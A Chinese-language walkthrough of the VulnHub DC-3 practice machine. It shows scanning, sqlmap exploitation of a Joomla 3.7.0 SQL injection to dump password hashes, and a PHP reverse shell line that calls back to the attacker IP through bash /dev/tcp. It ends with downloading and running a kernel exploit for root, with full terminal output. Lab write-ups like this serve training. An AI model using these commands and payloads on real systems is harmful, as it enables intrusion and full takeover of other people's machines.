我爱做靶机之DC-3

下载地址：https://www.vulnhub.com/entry/dc-3,312/

 主机发现

扫描端口，发现只开启了80端口，通过-A参数，还可以看到该网站的CMS为Joomla

 访问80端口

目录扫描，发现网站后台

使用nikto工具:nikto -host 192.168.44.144

使用dirsearch工具

python3 dirsearch.py -u http://192.168.44.144 -e php

使用joom专用漏洞扫描器joomscan，发现joomla的具体版本号

git clone https://github.com/rezasp/joomscan.git

cd joomscan

perl joomscan.pl 192.168.44.144

使用searchsploit搜索joomla 3.7.0存在的漏洞

searchsploit joomla 3.7.0

读取

根据给出的路径，读取该文件，发现该版本cms内存在sql注入漏洞CVE-2017-8917

打开sqlmap开始注入

暴库

python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"

暴表

python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb --tables

暴字段

python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T #__users --columns

暴内容

python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T #__users -C "name,password" --dump

用户名：admin

密码：$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

使用kali的John进行密码破解，得到后台登录密码snoopy

进入之前找到的网站后台进行登陆http://192.168.44.144/administrator/

在后台翻啊翻，发现了某处可以修改网站模版的地方，可以直接新建一个PHP文件，直接反弹shell。

<?php system("bash -c 'bash -i >& /dev/tcp/192.168.44.142/8080 0>&1'");?>

在kali上进行监听，nc -lvvp 8080端口

在浏览器上访问该反弹马，这一块路径卡了一会儿，

结合之前目录扫描出来的templates目录，和模板的名称bees3,再加上linux系统是大小敏感的，

因此花费了一些时间，才找到正确的路径，进行访问

这是kali已经接收到了shell，

权限很低，首先尝试suid提权，以下命令可以发现系统上运行的suid可执行文件

1. find / -perm -u=s -type f 2>/dev/null

2. find / -user root -perm -4000 -print 2>/dev/null

3. find / -user root -perm -4000-exec ls -ldb {}

已知的可用来提权的linux可行性的文件：nmap,vim,find,bash,more,less,nano,cp

没有发现可以利用的文件

尝试内核提权

查看linux版本

利用searchsploit搜索可以利用的漏洞

根据路径，访问exp详细内容：cat /usr/share/exploitdb/exploits/linux/local/39772.txt 

发现exp下载地址：https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

查找具有执行权限的目录

切换到tmp文件夹下,并且下载searchsploit中的exp

切换：cd tmp

下载：wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

解压：unzip 39773.zip

再解压：tar -xvf exploit.tar

切换：cd ebpf_mapfd_doubleput_exploit/

执行： ./compile.sh

            ./doubleput

然后得到了root权限

www-data@DC3VM:/var/www/html$ cd tmp
cd tmp
www-data@DC3VM:/var/www/html/tmp$ ls
ls
index.html
install_5c96069d60a51
install_5c9607f66e6c1
packages
pkg_proclaim.zip
pkg_proclaim_package.xml
script.php
www-data@DC3VM:/var/www/html/tmp$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
<ploitdb-bin-sploits/raw/master/bin-sploits/39772.zip                                                                                                                
--2020-04-09 23:27:16--  https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip                                                
Resolving github.com (github.com)... 13.250.177.223                                                                                                                  
Connecting to github.com (github.com)|13.250.177.223|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip [following]
--2020-04-09 23:27:17--  https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.108.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7025 (6.9K) [application/zip]
Saving to: '39772.zip'

     0K ......                                                100% 4.44M=0.002s

2020-04-09 23:27:18 (4.44 MB/s) - '39772.zip' saved [7025/7025]

www-data@DC3VM:/var/www/html/tmp$ ls
ls
39772.zip
index.html
install_5c96069d60a51
install_5c9607f66e6c1
packages
pkg_proclaim.zip
pkg_proclaim_package.xml
script.php
www-data@DC3VM:/var/www/html/tmp$ unzip 39772.zip
unzip 39772.zip
Archive:  39772.zip
   creating: 39772/
  inflating: 39772/.DS_Store         
   creating: __MACOSX/
   creating: __MACOSX/39772/
  inflating: __MACOSX/39772/._.DS_Store  
  inflating: 39772/crasher.tar       
  inflating: __MACOSX/39772/._crasher.tar  
  inflating: 39772/exploit.tar       
  inflating: __MACOSX/39772/._exploit.tar  
www-data@DC3VM:/var/www/html/tmp$ ls
ls
39772
39772.zip
__MACOSX
index.html
install_5c96069d60a51
install_5c9607f66e6c1
packages
pkg_proclaim.zip
pkg_proclaim_package.xml
script.php
www-data@DC3VM:/var/www/html/tmp$ cd 3977
cd 39772
www-data@DC3VM:/var/www/html/tmp/39772$ ls
ls
crasher.tar
exploit.tar
www-data@DC3VM:/var/www/html/tmp/39772$ tar -xvf exploit.tar
tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
www-data@DC3VM:/var/www/html/tmp/39772$ ls
ls
crasher.tar
ebpf_mapfd_doubleput_exploit
exploit.tar
www-data@DC3VM:/var/www/html/tmp/39772$ cd ebpf
cd ebpf_mapfd_doubleput_exploit/
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
ls
compile.sh
doubleput.c
hello.c
suidhelper.c
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doub
./doub
bash: ./doub: No such file or directory
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
<l/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh                      
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .insns = (__aligned_u64) insns,
             ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .license = (__aligned_u64)""
               ^
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
ls
compile.sh
doubleput
doubleput.c
hello
hello.c
suidhelper
suidhelper.c
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
<l/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput                       
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...

bash -i
bash: cannot set terminal process group (1315): Inappropriate ioctl for device
bash: no job control in this shell
root@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit# whoami
whoami
root
root@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit# exit
bash: [2708: 2 (255)] tcsetattr: Inappropriate ioctl for device
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$